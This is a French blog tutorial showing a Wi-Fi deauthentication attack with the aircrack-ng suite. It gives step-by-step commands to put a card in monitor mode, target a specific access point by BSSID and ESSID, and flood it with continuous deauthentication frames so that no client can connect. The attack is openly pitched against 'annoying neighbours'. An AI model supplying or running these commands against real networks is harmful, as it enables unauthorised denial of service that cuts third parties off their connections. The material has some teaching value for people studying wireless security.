Attaque WEP : Deauthentication

To the non-french speaker, note that you can translate the articles using the Google Trad widget situated at the bottom of all pages.


Comme vous avez pu le voir, j’ai linké deux fois le même article à la fois dans la section WEP et dans la section WPA. La raison est simple : l’attaque par deauthentication fonctionne pour les deux protocoles. On pourrait se dire que le chiffrement des données empêchent ce genre d’attaques mais en fait pas du tout.

Avec WPA/2 seuls les trames de données sont chiffrées. Les trames de management (typiquement les trames de deauthentication) ne le sont pas. Donc on peut utiliser des trames deauthentication sur un réseau WPA/2 🙂 !


Si vous avez des voisins ennuyants j’ai la solution pour vous : l’attaque deauthentication d’Aircrack-ng. L’attaque est simple, on va cibler un point d’accès et on va tout simplement envoyé des paquets de deauthentication à toutes les machines connectées dessus.

Comme d’hab pour commencer nous allons passer notre carte Wi-Fi en mode monitor avec la commande suivante :

airmon-ng start wlan0

Puis nous allons partir  la recherche du point d’accès que l’on veut attaquer à l’aide de cette commande :

airodump-ng --encrypt wep wlan0mon

Fun fact, vous pouvez aussi bien attaquer WEP que vous WPA ou WPA2. Personne n’est à l’abri ahah !

cible.png

Ensuite on relance la commande en spécifiant que l’on cible le point d’accès d’ESSID NUMERICABLE-52D1 :

airodump-ng --bssid 24:EC:99:A5:E0:9B --channel 1 wlan0mon

ciblemore.png

La dernière ligne nous indique qu’il y a bien une machine de déconnecter. Nous allons donc forcer la déconnexion via aireplay-ng.

Pour cela entrez la commande suivante :

aireplay-ng -0 0 -e NUMERICABLE-52D1 -b 24:EC:99:A5:E0:9B wlan0mon

Voila ce qu’on obtient :

deauth.png

Maintenant si on retourne sur airodump :

final.png
Plus de clients ! Ah et au fait j’ai mis -0 0, cela veut dire que les paquets de deauthentication sont envoyés en permanence. Donc tant que vous ne stoppez pas la commande, personne ne pourra se connecter au point d’accès.

L’avantage comparé à KickThemOut, c’est que l’on a même pas besoin d’être sur le réseau pour effectuer cette manipulation… A utiliser sagement 😉 !

Un commentaire

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l'aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s